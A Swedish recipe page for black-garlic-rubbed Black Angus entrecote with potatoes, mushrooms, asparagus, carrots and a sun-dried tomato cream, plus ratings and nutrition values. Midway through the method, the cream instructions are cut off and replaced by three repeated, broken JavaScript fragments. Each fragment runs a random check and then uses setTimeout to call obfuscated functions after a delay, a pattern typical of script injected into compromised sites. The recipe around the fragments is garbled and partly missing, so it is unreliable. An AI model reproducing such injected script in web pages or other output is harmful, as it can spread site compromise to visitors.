Svartvitlöks masserad Black Angus (entrecote)

2013-09-08
_SAM0268_SAM0264_SAM0261
  • Servings : 1-2
  • Prep Time : 5m
  • Cook Time : 20m
  • Ready In : 25m

Ni behöver inte använda svartvitlök det går lika bra med vanlig vitlök.

  • 200g entrecote.
  • 150g 2st kvartade potatisar
  • 80g 2st hackade skogschampinjoner
  • 50g 4st sparris
  • 50g 4st små morötter
  • 2st svarta vitlöksklyftor (vitlök)
  • 5g smör
  • Svartpeppar
  • Örtsalt

Soltorkad tomatkräm

  • 50g kvarg
  • 10g 1/2 soltorkad tomat i avrunnen olja
  • Örtsalt
  • Svartpeppar

Gör så här:

Sätt igång ugnen på 200C grill

Gnid in den svarta vitlöken på entrecoten på båda sidorna.
Den svarta vitlöken är så mjuk att den kommer att göra så köttet ser smutsigt ut. Har ni en vanlig vitlök. Dela den på hälften och gnid den över köttet ca 1 minut. Låt den stå i rumstemperatur.

Blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a krämen.

Lägg potatis med champinjon, svartvitlök, smör, svartvitlök och örtsalt i ugnen ica 20 minuter. Grilla sparrisen och moroten i en grillpanna i ca 10 minuter. Lägg dom åt sidan.
Grilla entrecoten i ca 10 minuter avsluta med svartpeppar och örtsalt. Lägg den åt sidan för att vila. Lägg tillbaka grönsakerna på grillen, använd en pensel för att glasera med köttsafterna från köttet.

Medlemsbetyg

(4.5 / 5)

4.5 5 2
Betygsätt recept

2 people rated this recipe

Related Recipes:
  • Nutellapannkakor

    Nutellapannkakor

  • _SAM0905

    Sallad på svartvitlöks rostad pumpa, lök, paprika, tomat med chevreost, spenat och svartkålschips.

  • _SAM0920

    Svartvitlöks rostad kyckling

  • _SAM0671

    Sremska korv med rostad gulbeta, potatis, sparris, spenat, svartvitlök med fetaostkräm

  • Vitchoklad & hallonpudding

    Vitchoklad & hallonpudding

Näringssinnehåll

Informationen gäller per portion

  • kCal

    593,1
  • Protein

    53,3 g
  • Kolhydrater

    17,4 g
  • Fett

    12,7 g

Recipe Comments

Post A Comment

Current ye@r *